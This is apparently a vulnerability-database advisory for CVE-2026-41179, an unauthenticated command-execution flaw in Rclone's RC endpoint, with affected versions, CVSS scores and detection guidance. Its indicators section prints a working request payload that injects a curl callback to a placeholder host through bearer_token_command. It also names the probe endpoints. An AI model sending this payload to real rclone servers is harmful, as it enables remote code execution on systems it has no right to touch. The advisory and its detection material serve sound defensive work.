cbcvebase.
CVE-2026-41179
published 2026-04-23

CVE-2026-41179: Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version…

PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.20%
94.7th percentile
Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Starting in version 1.48.0 and prior to version 1.73.5, the RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthenticated local command execution possible on reachable RC deployments without global HTTP authentication. Version 1.73.5 patches the issue.

Affected

9 ranges
VendorProductVersion rangeFixed in
github.comrclone_rclone>= 1.46.0 < 1.74.31.74.3
github.comrclone_rclone>= 1.48.0 < 1.73.51.73.5
oadpoadp-mustgather-rhel9
oadpoadp-velero-restic-restore-helper-rhel9
oadpoadp-velero-rhel9
rclonerclone
rclonerclone>= 1.48.0 < 1.73.51.73.5
rhacm2volsync-rhel9
ubunturclone

Detection & IOCsextracted from sources · hover to see the quote

url/rc/noop
url/operations/fsinfo
command{"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}
  • Probe for unauthenticated RC endpoint availability by sending an empty POST to /rc/noop and checking for HTTP 200 with JSON content-type before attempting exploitation.
  • Detect exploitation attempts targeting /operations/fsinfo with inline WebDAV backend definitions containing bearer_token_command in the fs parameter — a single unauthenticated POST is sufficient for RCE.
  • The RC server must be started via `rclone rcd` or the `--rc` flag and deployed without authentication for the vulnerability to be exploitable; monitor for rclone RC server processes exposed beyond localhost.
  • The vulnerability exists in Rclone versions >= 1.48.0 and < 1.73.5; flag any deployment of these versions with an exposed RC endpoint.
  • The attack vector is the inline backend definition syntax in the `fs` parameter (e.g., `:webdav,...,bearer_token_command='...':`); inspect POST bodies to /operations/fsinfo for this pattern.
  • For the WebDAV backend specifically, bearer_token_command is executed at backend initialization time — monitor for outbound network connections or process spawns originating from the rclone process shortly after a POST to /operations/fsinfo.
  • ·Exploitation requires the RC server to be running (via `rclone rcd` or `--rc` flag) AND configured without global HTTP authentication. Deployments with authentication enabled are not directly vulnerable.
  • ·Red Hat notes that because their products expose the RC server only to localhost, the practical impact is reduced — network-exposed RC deployments are the primary risk.
  • ·The fix is in version 1.73.5; the patch adds `AuthRequired: true` to the `operations/fsinfo` endpoint to prevent unauthenticated access.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.2CRITICALCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.8CRITICAL
vendor_redhat9.2CRITICAL
vendor_ubuntu9.2CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.